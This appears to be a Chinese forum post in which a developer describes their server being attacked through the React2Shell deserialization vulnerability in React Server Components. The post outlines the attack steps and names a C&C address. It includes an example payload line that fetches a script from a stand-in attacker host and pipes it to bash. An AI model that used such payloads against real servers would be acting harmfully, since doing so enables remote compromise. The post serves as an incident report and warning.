This topic created in 172 days ago, the information mentioned may be changed or developed.

React2Shell (CVE-2025-55182)

dodoa · 2025-12-09T01:56:48Z

React2Shell (CVE-2025-55182) 原文链接： https://www.rapid7.com/blog/post/etr-react2shell-cve-2025-55182-critical-unauthenticated-rce-affecting-react-server-components/ 攻击者的恶意脚本： https://gist.github.com/ripplek/c82170ea2627e7b8350ac0d434b03ed0 前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云，结果周末就遭遇了攻击。漏洞原理 React Server Components 的反序列化漏洞： RSC 使用自定义序列化格式在服务器与客户端之间传输数据服务器会反序列化客户端发送的 RSC payload 漏洞允许攻击者注入特制序列化数据服务器在反序列化过程中可能执行任意代码攻击步骤（概述） 1. 发现目标扫描使用 Next.js 或其他 RSC 框架的服务器识别处理 RSC 请求的端点 2. 构造恶意 payload 创建特制的 RSC 序列化数据注入可执行任意代码的片段，例如： // 恶意 RSC payload 中可能包含的示例 eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")') 3. 发送攻击请求向 RSC 端点发送 POST 请求携带恶意序列化 payload 无需身份验证 4. 服务器执行服务器反序列化 payload 触发代码执行下载并运行 python.sh 5. 后门建立 python.sh 下载后门程序后门连接至攻击者 C&C 服务器（如： 119.45.243.154:8443 ）攻击者获取持续访问权限

原文链接：
https://www.rapid7.com/blog/post/etr-react2shell-cve-2025-55182-critical-unauthenticated-rce-affecting-react-server-components/
攻击者的恶意脚本：
https://gist.github.com/ripplek/c82170ea2627e7b8350ac0d434b03ed0

前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云，结果周末就遭遇了攻击。

漏洞原理

React Server Components 的反序列化漏洞：

RSC 使用自定义序列化格式在服务器与客户端之间传输数据
服务器会反序列化客户端发送的 RSC payload
漏洞允许攻击者注入特制序列化数据
服务器在反序列化过程中可能执行任意代码

攻击步骤（概述）

1. 发现目标

扫描使用 Next.js 或其他 RSC 框架的服务器
识别处理 RSC 请求的端点

2. 构造恶意 payload

创建特制的 RSC 序列化数据
注入可执行任意代码的片段，例如：

// 恶意 RSC payload 中可能包含的示例
eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")')

3. 发送攻击请求

向 RSC 端点发送 POST 请求
携带恶意序列化 payload
无需身份验证

4. 服务器执行

服务器反序列化 payload
触发代码执行
下载并运行 python.sh

5. 后门建立

python.sh 下载后门程序
后门连接至攻击者 C&C 服务器（如：119.45.243.154:8443）
攻击者获取持续访问权限

React2Shell

rsc

反序列化

1 replies • 2025-12-09 11:07:22 +08:00

songsongqaq

Dec 9, 2025

已中招

中招了 React2Shell 一个影响 React 的严重未经身份验证的远程代码执行漏洞